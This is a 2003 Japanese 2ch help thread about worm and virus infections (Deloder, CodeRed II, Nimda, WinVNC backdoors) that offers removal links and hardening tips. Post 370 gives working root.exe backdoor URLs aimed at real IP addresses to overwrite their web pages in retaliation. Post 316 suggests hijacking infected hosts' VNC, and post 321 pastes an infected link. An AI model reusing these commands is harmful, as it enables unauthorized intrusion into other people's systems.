また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

次の質問どうぞ
 ↓ ↓ ↓

215 :名無しさん@お腹いっぱい。:03/03/08 13:46
>>209-211
>>2
・ノートンを使用して誤反応かな と思う人はこちら
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50

216 :名無しさん@お腹いっぱい。:03/03/08 14:28
ノートン2003を入れてからウィルス警告が頻発します。
OS:WIN2000SP3
「Backdoor.IRC.Zcrew」「IRC Trojan」「BAT.Trojan」
等です。どうも発生源は「system32」のフォルダみたいなのですが
B'SRecoder等ではシェルを起動すると「mIRCR」と言うソフトが
一緒に起動してしまいます。
感染源のフォルダ考えると再インストールしかないですかね...。
先日LAN接続を止めたのが駄目だったかな。



217 :名無しさん@お腹いっぱい。:03/03/08 15:25
やっぱりウイルス対策ソフトも相当古くなったウイルスは発見しなくなるんですか?


218 :平野謙:03/03/08 16:10
どもです。あのぉ、W32.Opaserv.K.Wormに感染しんですが
電源を入れるとnoticeと出て、www.bsa.orgのホムペが表れて以後
動かなくなってしまうんですが、どしたら復活するんでしょうか?
おながいしまっす。OSは98です。


219 :名無しさん@お腹いっぱい。:03/03/08 16:30
>>218
ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4939
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.opaserv.worm.removal.tool.html

お好きなほうの修復ツールを使ってください。


余談ですが、野球好きですか?

220 :cheshire-cat ◆PhCATJR.v6 :03/03/08 16:30
>>216
Symantec推奨の通り、最新の定義ファイルで、セーフモードで起動してスキャンしたらどうでしょか。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.irc.zcrew.html

>>217
あまりにも古いのは、定義ファイルから外されたりするらしです。

221 :名無しさん@お腹いっぱい。:03/03/08 23:50
age

222 :名無しさん@お腹いっぱい。:03/03/09 00:49
REDLOFが未だに流行ってるんですが。
しかもトレンドマイクロ社のHP見たらランキング順位上がってるという罠。

223 :ぼるじょあ ◆yBEncckFOU :03/03/09 02:11
そんなこというならバッドトランスだってニムーダだってそれなりに流行ってるYO!

224 :名無しさん@お腹いっぱい。:03/03/09 09:47
age

225 :名無しさん@お腹いっぱい。:03/03/09 11:40
突然445/TCP宛のパケットが沢山来るようになったんだけど、
何か新たにはやってるワームとかってあるのかな?

226 :名無しさん@お腹いっぱい。:03/03/09 11:45
>>225
恐らくコレかと。
http://nyamco.ath.cx/nyamco/source/7280.jpg

227 :名無しさん@お腹いっぱい。:03/03/09 12:32
>>226
うんこぉぉぉぉぉー

228 :名無しさん@お腹いっぱい。:03/03/09 12:39
>>225

http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.deloder.html

これかと

229 :名無しさん@お腹いっぱい。:03/03/09 16:36
Winvncが勝手にインストールされて困っています。

WINNT\Fontsディレクトリに
explorer.exe/rundll32.exe/vnchook.dll/omnithread.dll
WINNT\system32ディレクトリに
dvldr32.exeが作成され、
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run
にもキーが書かれていて、
実行ファイル・レジストリともに何度消しても復活してきます。

この症状になってから、通信量が膨大になっているようです。

>>39さんのようにPSEXESVC.EXEがプロセスに存在したので
TROJ_FLOOD.BI.DRかなと思ったのですが、
STDE9.exeは存在せず
シマンテック・ウイルスバスター両方のオンライン検索で全ドライブスキャンしても
何も検出されません。

Winvncというソフトは、今まで使った覚えは全くないです。

HDDをフォーマットしOS再インストしただけの状態でも現れたので
バックアップにまわしている、ファイルだけが置いてある内蔵HDDから経由したのでしょうか。
フォーマット後、バックアップドライブの方は一切さわってなかったのですが・・・。

ていうかメインドライブ3回フォーマットしても出てきやがる(´Д⊂ヽ


230 :229:03/03/09 16:52
度忘れ。環境はWin2kSP3・IE6・CATV接続です。

231 :名無しさん@お腹いっぱい。:03/03/09 17:41
http://www.nai.com/japan/virusinfo/virW2002.asp?v=WinVNC
マカフィーのWinvnc情報には勝手にコピーする云々って書いてあるけど
個人的にはCATV経由って気がしないでもない

232 :名無しさん@お腹いっぱい。:03/03/09 17:41
詳しくしらないけど、元は遠隔操作用のソフトじゃないかな。
ttp://www.amy.hi-ho.ne.jp/masuda/pc/vnc/index.html
これを改造してウイルスぽくしたものだと思うけど。
これ以上情報を流さないために、とりあえず不必要なポートを閉じるのが先決かと。
あと、
HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
想像だけどこういうレジストリあったら1にするといいかも。

233 :232:03/03/09 17:43
おぉ、同時カキコだ。やっぱウイルスだったのか。

234 :229:03/03/09 18:16
>>231 >>232
ありがとうございますー。
でも、マカフィーのトライアル版でもスキャンしてみたんですけど
何もでてこないんですよねぇ・・・。
今はレジストリ・実行ファイルとも消したまんま出てきてないんで、
また復活してたら試してみまっす。

>>HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
>>想像だけどこういうレジストリあったら1にするといいかも。

これもその時に。

235 :名無しさん@お腹いっぱい。:03/03/09 21:10
age

236 :http://ura2ch.free-city.net/:03/03/09 23:52
ura2ch ura2ch

237 :名無しさん@お腹いっぱい。:03/03/10 00:07
>>229
俺も全く同じ状況だった。
環境は、win2k・IE6・ADSLです。
dvldr32.exeが一分間に2,300回のアクセスをしてた(鬱
とりあえず、ファイルとレジストリ削除して再起動したら
きちんと消えてたよ。復活したらやだなぁ。

ちょっと前にsdbot.genとIRC.FLOODに感染してたため、
2週間ほど前に駆除してました。関係あるかな?

完全に駆除できるまでは、zoneでブロックしときます・・・。

>>HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
>>想像だけどこういうレジストリあったら1にするといいかも。

\AuthRequiredはありませんでした。

238 :名無しさん@お腹いっぱい。:03/03/10 01:09
S社・T社・N社()製のものは結構ウイルス検出で失敗してます。
詳しくはこちらのサイトご覧下さい・・・(イギリスの独立機関)
ttp://www.virusbtn.com/vb100/archives/tests.xml?200302
ちなみに検出で失敗がないのはVirus Chaserだけだったと思うが・・・
(但しフリーソフトは調査対象外)

239 :名無しさん@お腹いっぱい。:03/03/10 01:11
最近新種のワームに感染しまくり。
いちいち消すのがめんどい。
ワーム糞食らえだよ・・・。
バスター入れてても、あんまり役に立たんよ。

>>229
正直、CATVの環境はやばいと思う。
漏れもそうだが、CATVがかなり狙われてると思う。
おっと、書いてる途中にも感染しやがった・・・。

240 :名無しさん@お腹いっぱい。:03/03/10 01:41
age


241 :名無しさん@お腹いっぱい。:03/03/10 08:52
W32.HLLW.Deloder
http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.deloder.html

242 :名無しさん@お腹いっぱい。:03/03/10 08:56
WORM_DELODER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_DELODER.A

243 :名無しさん@お腹いっぱい。:03/03/10 09:41
>>238S社・T社・N社100%になってるが?どこぞの社員さんですか?

244 :名無しさん@お腹いっぱい。:03/03/10 10:39
>>243
そんな解りきった事、もちろん(ry

245 :238:03/03/10 12:31
うーめんどいな。。。。

100%という表示は「100%OK」という意味ではありません。
詳細情報はこのページから各商品ごとに見て行ってつかーさい。
S社;http://www.virusbtn.com/vb100/archives/products.xml?symantec.xml
   「Overview」 Result summary: 19 passes / 6 fails
T社;http://www.virusbtn.com/vb100/archives/products.xml?trend.xml
   「Overview」 Result summary: 4 passes / 7 fails
N社:http://www.virusbtn.com/vb100/archives/products.xml?nai.xml
   「Overview」 Result summary: 10 passes / 16 fails

英語表示だからメンドイケドよく読んでね。
(もしかしてそちらが上記3社のうちの社員さん?)

246 :名無しさん@お腹いっぱい。:03/03/10 14:02
Winvnc漏れもインスコされますた。
環境は、やはりWin2k
しつこくインストを要求されるので思わずokを押してしまった。
実行後、アプリケーションの追加と削除でアンインストールできるみたい。
どの程度クリーンになるのかは不明

247 :名無しさん@お腹いっぱい。:03/03/10 14:03
【奇跡よ、】田代まさしを1位にしよう!【再び!】


春の訪れを感じる今日この頃、皆様にはますますご健勝のことと思います。
さて、この度、我が2ちゃんねる祭り板において、下記のような祭りを開催いたしており、
皆様にも援助をしていただきたく、依頼に参った次第であります。
何卒、よろしくお願い申し上げます。

★21世紀偉人投票所★
http://m2ok1.no-ip.com/vote/tvote.cgi?event=vote1

248 :名無しさん@お腹いっぱい。:03/03/10 14:14
私もDELODERに感染してました。
>>237さんと同様で、環境は、win2k・IE6・ADSLです。
先週、IRC.FLOODに感染してました。何か関係が有るのでしょうか?
私はバスター入れてますが、気付いたときはinst.exeとexplorerが
常駐してまして、ちょっと焦りました。

249 :名無しさん@お腹いっぱい。:03/03/10 16:21
DELODER うざいね。
445 (Direct Hosting) を定期的に飛ばしている馬鹿がいたけど、
先週末から急に増えたんで、「また、Windows でなんかはやってんなぁ」と思ってた。
おれ ybb だけど、この 36 時間で外部からコネクトしてくるパケットの
144 / 738 (19.51)% が 445 だ。
まぁ先週は ybb 内で broadcast や multicast 飛ばしててる香具師が多かったから
実際はほとんどが DELODER だね。


250 :名無しさん@お腹いっぱい。:03/03/10 16:34
あ、ほんとだ凄い
日ごろログなんか見てないから気にしてなかったけど445がいっぱい
137の時はYBBで蚊帳の外だったから少し嬉しい

251 :l:03/03/10 16:35
http://www.pink-angel.jp/betu/linkvp2/linkvp.html
★その目で確認すべし!!★超おすすめ★

252 :名無しさん@お腹いっぱい。:03/03/10 16:36
137も相変わらず多いが445はもっと多くなったな。

253 :名無しさん@お腹いっぱい。:03/03/10 16:37
445大漁!

254 :名無しさん@お腹いっぱい。:03/03/10 16:43
>>249
YBBって…オマエ、その時点で

255 :名無しさん@お腹いっぱい。:03/03/10 17:12
やたらと同プロバイダから来ていた137がぴたっと止まった。
やっと気づいたのか?
で、皆様と同じように445が来てます。
同じIPが3回連続(希に2回)で叩いてくるな。

256 :名無しさん@お腹いっぱい。:03/03/10 17:15
うちは2回ワンセット、ポートスキャンと通信の要求。
みんなウリナラからだけど。

257 :名無しさん@お腹いっぱい。:03/03/10 17:31
>>255-256
TCPなんだから連続しても何の不思議も無い。

258 :名無しさん@お腹いっぱい。:03/03/10 17:56
つまり、
・ポート445が開いてて
・ユーザ名Administratorが有効で
・パスワードが簡単なヤツ
が危険ってことでいいですか?

259 :名無しさん@お腹いっぱい。:03/03/10 18:10
>>258
Administratorの名前変えてる香具師なんているの?

260 :名無しさん@お腹いっぱい。:03/03/10 18:12
俺変えてる

261 :名無しさん@お腹いっぱい。:03/03/10 18:15
標準の名前をそのまま使ってるのは危険

262 :名無しさん@お腹いっぱい。:03/03/10 18:33
変えるのが普通だろ

263 :名無しさん@お腹いっぱい。:03/03/10 18:35
既知のadministratorは変えるのが鉄則、当然パスワードも設定。
アカウント名もパスワードも簡単な単語等は厳禁。

264 :名無しさん@お腹いっぱい。:03/03/10 18:43
>>261-263
漏れはAdminでログインする事なんて滅多に無いから複雑で長いパス設定して終わり。

265 :249:03/03/10 18:50
>>254
別に家で使うんだったら問題ないぜ。俺はね。
会社で B-Flet's + so-net だけど、やってくるパケットは似たようなもん。
むしろ、so-net の方は net-bios 絡みがガンガンくるね。
両方とも LinuxBox で Netfilter を利用した router を構築してるよ。
# 今は会社の管理権限がないけどな。

266 :名無しさん@お腹いっぱい。:03/03/10 19:22
貼っとく

Tips for Windows
Administratorアカウントの名称を変更する
http://www.zdnet.co.jp/help/tips/windows/w0523.html

267 :名無しさん@お腹いっぱい。:03/03/10 20:41
age

268 :ぽるじょあ ◆yBEncckFOU :03/03/10 21:21
>>261-263
(・3・) エェー
朕はAdminでログインする事なんて滅多に無いYO−
その代わりいつものアカウントはフル権限にしてるYO−
その代わりパスは英数字16文字だYO−
NTLMハッシュ抜いて解きたいしとは、気長に待つか、分散コンプユーテングでもしてNE


269 :484:03/03/10 21:23
BKDR_DOMWIS.Aというウィルスに感染してしまったようなのですが、
以下のURLの通りレジストリの値を削除して再起動したのですが、
感染源の実行ファイルを削除できません。どうしたら良いのでしょう?
(´Д⊂グスン

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DOMWIS.A

270 :名無しさん@お腹いっぱい。:03/03/10 21:25
>>269
OSは?削除できないファイルのパスは?

271 :264ぼるじょあ ◆yEbBEcuFOU :03/03/10 21:42
>>268
(・3・) オゥ 一緒だYO

272 :名無しさん@お腹いっぱい。:03/03/10 21:43
>>269
それ良く出来てるね。
XPのホームなんてパス設定しないで入れてるヤシ多いし。むしろそこが狙い目かにょ。
漏れの友達もパス忘れるの嫌がって設定してないし。。。
つか、組み込みパスリストの中に、「2600」有るのは藁ったぢょ。
XPのホームってデフォルトでADMINアカウント組み込んで有るらしいけど、それって
デフォルトでもリモートからログイン許してるの?

273 :名無しさん@お腹いっぱい。:03/03/10 21:49
でろだー

でないだー

274 :225:03/03/10 21:53
>>228 返事遅くなりました。どうもありがとう!

275 :484:03/03/10 21:54
>>270
 (´Д⊂グスン WINNTフォルダ内のRUNDLL16.EXEです。
ご教示お願い致します。
ちなみにOSはWindows2000Proです。

276 :272:03/03/10 22:00
>>273返事遅くなりました。どうもありがとう!



277 :264ぼるじょあ ◆yEbBEcuFOU :03/03/10 22:05
>>272
(・3・) エェー セーフモードと回復コンソールでしかログイン出来なかった気がするYO

278 :名無しさん@お腹いっぱい。:03/03/10 22:13
>>268
> いつものアカウントはフル権限にしてるYO−
うっかり変なものインストールして脂肪の予感…

279 :272:03/03/10 22:15
>>276
そうなのでつか。安心でつ。
デホルトのアカウントだとむしろw2Kの方が怖いのでつか。
つか、XPでもパス空白にしてれば同じでつか。

>272は思わずDELODER_Aと勘違いしてカキコしてしまいました。>>269と全然関係ないね。欝。


280 :279:03/03/10 22:17
>>277でした
欝欝。

281 :445:03/03/10 23:18
445 をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 64.119.215.116,445
リモートアドレス、 サービスは 218.24.69.17,3803

210.220.67.147  219.140.141.114
203.69.17.70  210.111.21.97
203.185.20.140 61.102.14.60
218.113.116.10 211.154.210.45
24.29.132.253 211.242.7.111
210.127.217.158  218.162.28.128

282 :名無しさん@お腹いっぱい。:03/03/10 23:29
ポート445スレはここでいいのか?

283 :名無しさん@お腹いっぱい。:03/03/10 23:36
デロダーについての質問なのですが、
どのパスワード使って侵入するんですか?
フリーメールのパスワードとか、
懸賞応募のパスワードとかでも
侵入されるんでしょうか…?

284 :484:03/03/10 23:36
何故か再起動かけてもRUNDLL16.EXEのレジストリが
復活してしまいます。。・゚・(ノД`)・゚・。 うえええん

285 :名無しさん@お腹いっぱい。:03/03/11 00:07
>>283
sex

286 :名無しさん@お腹いっぱい。:03/03/11 00:17
sax

287 :名無しさん@お腹いっぱい。:03/03/11 00:27
>>266のやり方で変更しようと思ってるんですが
ローカルセキュリティポリシーが見つからないんですが
どこにあるんでしょうか?OSはXPです。


288 :名無しさん@お腹いっぱい。:03/03/11 00:32
>>287
肛門

289 :名無しさん@お腹いっぱい。:03/03/11 00:39
探したけどありませんでした。

290 :名無しさん@お腹いっぱい。:03/03/11 00:46
肛門になかった?奥まで探したのか?
gpedit.msc
secpol.msc
mmc

291 :名無しさん@お腹いっぱい。:03/03/11 01:19
Antidoteで毎日更新しようとしても、
開いたページが真っ白、何もない状態なんですが。

292 :名無しさん@お腹いっぱい。:03/03/11 01:47
>>287
safeモードで起動しる

293 :ぼるじょあ ◆yEbBEcuFOU :03/03/11 02:01
>>289
(・3・) エェー HomeEditionだRO〜 ProにしかないYO

294 :名無しさん@お腹いっぱい。:03/03/11 02:47
デロダーってファイル共有サービスにログインしてスタートアップにトロイ置くだけ?

295 :名無しさん@お腹いっぱい。:03/03/11 02:55
3.15(土) ピースウォーク PM 5:00 渋谷宮下公園
http://www.zengakuren.jp/

アメリカの暴走にのって攻撃を支持すれば、日本の国土を危険にさらしかねない。

296 :名無しさん@お腹いっぱい。:03/03/11 07:15
教えて下さい(OSはMEです)お願いします。
何かPCの調子が最近おかしいので、システムの復元をしようと思ったら
今までは復元ポイントがいくつもあったのに(カレンダーみたいに)
今はポイントが一つも無いんです(カレンダー自体ない、選択できない)
しかもこの日に対して復元ポイントがありませんと書いてある上には
<       1899年12月30日        > 
こんな感じになってます。
1899年????
左右の矢印みたいなの押してもだめ
最近ウイルスに感染してたみたいでJS_EXCEPTION.GENとHTML_SUAR.Aに
感染してたのですが関係あるのでしょうか?
他にもウイルスあったけど忘れてしまいました。
ウイルスが元で復元ポイントがおかしくなるとかありますか?

297 :296:03/03/11 07:32
追記です
復元ポイントを作成しようとしたら
復元ポイントの作成に失敗しましたとの文がでました。
どうかお願いします。

298 :名無しさん@お腹いっぱい。:03/03/11 08:04
ない。

299 :296:03/03/11 08:13
回答有難う御座います

300 :(´-ω-`):03/03/11 08:16
しゃれたサイトだ
http://homepage3.nifty.com/digikei/ten.html
           ∧..∧
キタ━━━━━━( ´Д`) ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
             '/ / \ __   ̄ ̄ ̄ ̄ ̄ ̄_____
            / /  . \   __     ______
       ,.,..,.、,,,,/ /、,\  . )..,_       /i
      ;' ´Д`(ノ,:、,/ /:,.:::: ::`゛:.:゛:`''':,'.´ -‐i  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      '、 ;: ...: ,:. :.:.:.\ \ _;.;;..; :..‐'゛  ̄  ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       `"゛"゛' ''`゛ `'(___)


301 :_:03/03/11 08:28
ポート445って塞いでもイイの?

302 :名無しさん@お腹いっぱい。:03/03/11 08:54
共有せんのやったら(・∀・)イイ!

303 :名無しさん@お腹いっぱい。:03/03/11 08:58
OSって入れ替えると、今パソに入ってるデータ全部消えるの?

304 :名無しさん@お腹いっぱい。:03/03/11 09:08
>>303
板違い。パソコン初心者@2ch掲示板http://pc2.2ch.net/pcqa/

305 :bloom:03/03/11 09:17
http://www.agemasukudasai.com/bloom/

306 :名無しさん@お腹いっぱい。:03/03/11 10:07
DELODERの件だけど、WindowsXPのHEは普通に使っている限り
Adminアカウントは「制限のため入れない」みたいな警告でて
ログインできない。だから感染しないみたいだが、実際どうなんだろな。
逆にセーフモードで起動した状態だとAdminで入れるんだよな。
DELODERがあれば実験してみるところだが、持ってないのでできん。

307 :名無しさん@お腹いっぱい。:03/03/11 10:26
で、デロダに感染したってやつに聞きたいんだけど、
やっぱり簡単なパスを使っていたの?

308 :名無しさん@お腹いっぱい。:03/03/11 10:43
>>307
トレンドマイクロにでろだが使うパス一覧がある。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_DELODER.A&VSect=T

さて問題です。
トレンドマイクロは不正アクセス禁止法に違反ではないのでしょうか?
どのホストと指定しないからセーフかな?

309 :名無しさん@お腹いっぱい。:03/03/11 12:19
>>308
adminiもスペースも大丈夫なのか。なるほど。
なんで不正アクセス?



310 :名無しさん@お腹いっぱい。:03/03/11 13:13
age

311 :tb:03/03/11 13:56
へぇ〜そうなの・・。
http://hkwr.com/
http://hkwr.com/bbs

312 :名無しさん@お腹いっぱい。:03/03/11 14:38
ということはadminアカウントにパスワード設定すれば
デロダーは防げるということか。

313 :名無しさん@お腹いっぱい。:03/03/11 16:17
すいません、出ろ基地下さい。

314 :名無しさん@お腹いっぱい。:03/03/11 20:13
出ろ基地などというものはない。

315 :名無しさん@お腹いっぱい。:03/03/11 21:52
デロダーにかかったヤシはこっちも見ると吉

【IT】パスワード甘いPCに侵入 新種ウィルスに感染警報
http://news2.2ch.net/test/read.cgi/newsplus/1047295113/

316 :名無しさん@お腹いっぱい。:03/03/11 22:13
で、デロダでVNC入れられたヤツ
VNCのポートは何番だった?パスワードは?

445にパケ送ってくる奴のデスクトップで遊べるかもしれん

317 :名無しさん@お腹いっぱい。:03/03/11 23:43
ウィルスバスター の検索結果で BAT_FOEOAPC.J ってのが
見つかったと言われたが、こんな名前のウィルス情報、何処
にも無いんですが…なんじゃろか?


318 :名無しさん@お腹いっぱい。:03/03/11 23:51
>>316
お前、リモート操作ソフトは VNC だけだと思ってるのかと小一時間。。。

319 :名無しさん@お腹いっぱい。:03/03/12 00:08
>>318
は? なんでそう思ったの?
デロダでVNC入れられたヤツ多いからさ

320 :名無しさん@お腹いっぱい。:03/03/12 09:55
age


321 :名無しさん@お腹いっぱい。:03/03/12 10:44
ttp://playstation2.hotgames.com/games/ringof/readme.eml
このウィルスにひっかかってしまったのですが、ウイルスバスターなどない場合どうすればいいですか?
今のところ特に以上ナシです、。

322 :名無しさん@お腹いっぱい。:03/03/12 11:02
>>321
ウィルス感染の可能性がある場合、直ちにネットワークから切断汁。
>>2>>6
やむを得ない場合はオンラインスキャン。
http://www.symantec.com/region/jp/securitycheck/index.html
http://www.trendmicro.co.jp/hcall/index.asp
今後はアンチウィルスソフトを常駐させておくこと。

323 :名無しさん@お腹いっぱい。:03/03/12 11:07
>>321
ていうか、貼るなよ。被害者が増えるでしょ。
ここを読みなはれ。
http://www.trendmicro.co.jp/nimda/

324 :名無しさん@お腹いっぱい。:03/03/12 11:15
>>323
今時、荷無駄に感染する馬鹿はあぼーんするのが世のため人のため。

325 :323:03/03/12 12:04
>>324
あぽーんされると漏れの仕事が増えるからイヤーン。
ウィルス対策ソフトに予算が出ない会社で管理者モドキしてるから。

326 :名無しさん@お腹いっぱい。:03/03/12 12:11
>>325
いまどきそんな会社、会社ごとあぼーんされろよ。

327 :名無しさん@お腹いっぱい。:03/03/12 12:37
なんか昨日から default.ida (nimda だったっけ) へのアクセスが
増えてるけど、なんでだろ?

328 :名無しさん@お腹いっぱい。:03/03/12 12:43

/ ̄⌒⌒ヽ
| / ̄ ̄ ̄ヽ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| |   /  \|   |
| |    ´ ` |   |
(6    つ /   .| >>372 なんでだろう〜♪
|   / /⌒⌒ヽ<
|    \  ̄ ノ  |
|     / ̄    \_________


329 :名無しさん@お腹いっぱい。:03/03/12 13:06
>>327順位上昇中だね。
http://isc.incidents.org/

330 :名無しさん@お腹いっぱい。:03/03/12 13:14
>>329
なんで今さらこんなのが来てるの?
もう1年半ぐらい前のじゃなかったっけ?

331 :名無しさん@お腹いっぱい。:03/03/12 13:15
>>326
そういう会社はえてして他のソフトにも予算をさかないから、会社ごとあぼーんも充分ある。

332 :ぼるじょあ ◆yBEncckFOU :03/03/12 13:38
>>330
  ☆。:.+:  /■\
   .. :.  ( ・3・ )  (・3・) なんでだろ〜なんでだろ♪
     / ̄ヽ/,― 、\ o。。。        なんでだ、なんでだろ〜♪
.:☆   | ||三∪●)三mΕ∃.     
.:*    \_.へ--イ\  ゚ ゚ ゚
+:..♪.:。゚*.:..  (_)(_)     ☆。:.+:
 ☆。:.+::..   ☆:.°+     .. :
   。*.:☆゚x*+゚。::.☆ο::.+。 *ρ

333 :名無しさん@お腹いっぱい。:03/03/12 13:41
CodeRed II (CodeRed.F)
http://securityresponse.symantec.com/avcenter/venc/data/codered.ii.html


334 :名無しさん@お腹いっぱい。:03/03/12 13:44
>>333
発見日は March 11, 2003 だけど、
August 05, 2001 以降の定義ファイルで対応できるみたいね。

335 :名無しさん@お腹いっぱい。:03/03/12 14:28
W32/CodeRed.a.worm
http://vil.mcafee.com/dispVirus.asp?virus_k=99142
UPDATE March 11, 2003:
The W32/CodeRed.f variant has been seen in the wild.
This variant is almost identical to the .C variant.

336 :名無しさん@お腹いっぱい。:03/03/12 16:29
上げます

>>333
日本語版登場
http://www.symantec.com/region/jp/sarcj/data/c/codered_ii.html

337 :名無しさん@お腹いっぱい。:03/03/12 16:55
今ごろになって…

米CERT/CCが「Deloder」ワームを警告,“弱い”パスワードのWindowsマシンが侵入される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030312/1/

338 :名無しさん@お腹いっぱい。:03/03/12 17:14
トレンドマイクロの方は Code Red II の情報ないね。

339 :名無しさん@お腹いっぱい。:03/03/12 17:55
ただいまシマンテックのオンラインウイルスチェック中
感染ファイル30に到達しました

DOS窓が開いてなんかしてたり
入れてもいないmIRCがどうこういうメッセージが出たり
ドクロマークのアイコンのついたWARPINGとかいうソフトが勝手に起動したりあ、さっきついにVNCのメッセージも出ました

やられたい放題だョ〜!

340 :名無しさん@お腹いっぱい。:03/03/12 17:56
それを言うなら「やられ放題」だろうが。

341 :名無しさん@お腹いっぱい。:03/03/12 17:58
>>339
情報共有化という意味では、
どんな環境で何に感染してたかを明確に書いてもらいたいのだが。

342 :名無しさん@お腹いっぱい。:03/03/12 18:13
ブラクラをうっかり踏んで以降、IEがおかしいです
指定したのと違うページに飛んでしまいます

オンラインウィルススキャンやウィルスバスターのお試し版では
探せなかったのですが、なんとか直す方法無いでしょうか?

343 :名無しさん@お腹いっぱい。:03/03/12 18:17
>>342
IE再インストールじゃだめなの?

344 :名無しさん@お腹いっぱい。:03/03/12 18:18
>>342
ウィルスとは限らないから、ウィルススキャンしても意味ないことがある。
ttp://homepage2.nifty.com/winfaq/c/ietrouble.html#370

今度からは踏む前にブラクラチェッカーhttp://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
使ったり、IEの設定を見直すこと。

345 :344:03/03/12 18:19
IEの修復も試してみれ。

346 :339:03/03/12 18:34
結局30個のファイルが感染してました
Backdoor.IRC.Zcrew がたくさん
IRC Trojan
Trojan Horse
Hacktool.Flooder  など

環境は Win2000、アカウントはAdminstratorのまま、ケーブル接続。
親と弟がメールをやっているので、そこから侵入した可能性あり。

面倒なのでフォーマットしてOS再インストールします。

347 :名無しさん@お腹いっぱい。:03/03/12 18:36
>>346
今後はウィルス対策製品導入して常駐させとけよ。
IRCもやめれ。

348 :名無しさん@お腹いっぱい。:03/03/12 18:41
そんなことよりも、脳波がヤバいので、逝ってきます

349 :名無しさん@お腹いっぱい。:03/03/12 18:42
Σ(゚д゚lll)

350 :bloom:03/03/12 18:45
http://www.agemasukudasai.com/bloom/

351 :名無しさん@お腹いっぱい。:03/03/12 19:08
かつて猛威をふるったCode Red型の新種ワームが拡散中
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030312/2/
>>333-336

352 :342:03/03/12 22:55
その時はIEの修復してみました
昨日はそれで直っていたのですが、今日同じ時間に
同じような症状が出てこりゃやられたのかなと焦りまして

アドレスを直接書き込んでも、ランダムにいろんなページに飛ぶような
たとえばこの板の再読み込みしようとしたらTBSのサイトに飛んだり
チェッカーにかけてみたら、そのブラクラサイトVBS_MERASH.Aがあったようなんですが
単にIEが壊れただけなんでしょうか…

353 :名無しさん@お腹いっぱい。:03/03/12 22:57
>>352
メモ帳使いなよ、超軽くていいよ。

354 :名無しさん@お腹いっぱい。:03/03/13 08:20
CodeRed.Fでシマンテックのセキュリティアラートでてるね。
http://www.symantec.com/region/jp/
http://www.symantec.com/region/jp/sarcj/data/c/codered.f.html
トレンドマイクロもイエローアラート。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CODERED.F

http://www.nai.com/japan/virusinfo/virC.asp?v=W32/CodeRed.f.worm
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030312/2/

355 :名無しさん@お腹いっぱい。:03/03/13 08:48
しかし、ふつーにウィルス対策してればCodeRed.Fなんて広まるわけないんだが……

356 :名無しさん@お腹いっぱい。:03/03/13 09:00
>>355
以前の定義ファイルで引っかかるわけだしね。なんでだろ。

357 :名無しさん@お腹いっぱい。:03/03/13 09:30
Apacheのログ見たら、昨日だけで13発のCodeRed II様が御来訪。
Nタイプの感染活動期には、多い時でも一日あたり3〜4発くらい。(昨日は1発だけ)
感染活動に新技を繰り出してくるわけでもないのに、
どうしてIIが広まってるのか、本当に不思議だね。
IISのパッチ当てずに、半端なワクチンだけで防いでたヤツがやられてるのかな?

358 :名無しさん@お腹いっぱい。:03/03/13 09:54
緊張感の緩んだ端境期に鯖起てた人とか

359 :名無しさん@お腹いっぱい。:03/03/13 13:57
また半島か?

360 :名無しさん@お腹いっぱい。:03/03/13 14:01
南北馬鹿半島&中国

361 :名無しさん@お腹いっぱい。:03/03/13 15:13
うちは昨日だけでも100回くらい来訪、
どうやら半島系が多いみたい

中にはAhooBBも(w

362 :名無しさん@お腹いっぱい。:03/03/13 15:27
>>361

http://isc.incidents.org/top10.html

世界中にで晒されてるぞ(w

363 :名無しさん@お腹いっぱい。:03/03/13 16:39
WinXPのHomeEditionは、SafeモードじゃないとAdministratorにはならないんでしょ?
だったらDELODER平気じゃない??違うの??

364 :名無しさん@お腹いっぱい。:03/03/13 16:43
>>363
>>337 http://pc.2ch.net/test/read.cgi/sec/1047322179/

365 :名無しさん@お腹いっぱい。:03/03/13 17:03
>>363
お前みたいな馬鹿がいるから…(鬱

366 :名無しさん@お腹いっぱい。:03/03/13 17:17
>>365
お前もな(w

367 :名無しさん@お腹いっぱい。:03/03/13 18:10
age

368 :名無しさん@お腹いっぱい。:03/03/13 18:35
pley.exe 、valent[1].jpg、仕事でメールアドレス晒してると
いらん添付ファイルが送られてきて鬱だ。

369 :名無しさん@お腹いっぱい。:03/03/13 23:15
age

370 :名無しさん@お腹いっぱい。:03/03/13 23:37
>>361
やり返せ!

view-source:http://218.14.47.235/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://200.82.153.179/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://200.204.68.125/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
